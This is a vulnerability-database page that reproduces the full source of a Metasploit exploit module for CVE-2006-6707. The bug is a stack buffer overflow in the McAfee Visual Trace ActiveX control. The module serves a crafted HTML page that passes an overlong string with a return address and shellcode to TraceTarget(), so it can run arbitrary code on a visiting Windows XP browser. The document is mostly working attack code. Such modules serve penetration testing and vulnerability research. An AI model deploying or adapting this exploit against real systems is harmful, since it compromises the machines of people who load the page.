Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
metasploitMC <[email protected]>MSF:EXPLOIT-WINDOWS-BROWSER-MCAFEEVISUALTRACE_TRACETARGET-
HistoryJul 08, 2007 - 2:24 a.m.

McAfee Visual Trace ActiveX Control Buffer Overflow

2007-07-0802:24:22
MC <[email protected]>
www.rapid7.com
39

8.3 High

AI Score

Confidence

Low

JSON

This module exploits a stack buffer overflow in the McAfee Visual Trace 3.25 ActiveX Control (NeoTraceExplorer.dll 1.0.0.1). By sending an overly long string to the β€œTraceTarget()” method, an attacker may be able to execute arbitrary code.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'McAfee Visual Trace ActiveX Control Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in the McAfee Visual Trace 3.25 ActiveX
        Control (NeoTraceExplorer.dll 1.0.0.1). By sending an overly long string to the
        "TraceTarget()" method, an attacker may be able to execute arbitrary code.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'MC' ],
      'References'     =>
        [
          [ 'CVE', '2006-6707'],
          [ 'OSVDB', '32399'],
          [ 'URL', 'http://web.archive.org/web/20061223042405/http://secunia.com:80/advisories/23463/' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'         => 800,
          'BadChars'      => "\x00\x09\x0a\x0d'\\",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows XP Pro SP2 English',  { 'Offset' => 483, 'Ret' => 0x7c941eed } ],
        ],
      'DisclosureDate' => '2007-07-07',
      'DefaultTarget'  => 0))
  end

  def autofilter
    false
  end

  def check_dependencies
    use_zlib
  end

  def on_request_uri(cli, request)
    # Re-generate the payload
    return if ((p = regenerate_payload(cli)) == nil)

    # Randomize some things
    vname	= rand_text_alpha(rand(100) + 1)
    strname	= rand_text_alpha(rand(100) + 1)

    # Set the exploit buffer
    sploit = rand_text_alpha(target['Offset']) + [target.ret].pack('V') + p.encoded

    # Build out the message
    content = %Q|<html>
      <object classid='clsid:3E1DD897-F300-486C-BEAF-711183773554' id='#{vname}'></object>
      <script language='javascript'>
      var #{vname} = document.getElementById('#{vname}');
      var #{strname} = new String('#{sploit}');
      #{vname}.TraceTarget(#{strname});
      </script>
      </html>
      |

    print_status("Sending #{self.name}")

    # Transmit the response to the client
    send_response_html(cli, content)

    # Handle the payload
    handler(cli)
  end
end

8.3 High

AI Score

Confidence

Low

JSON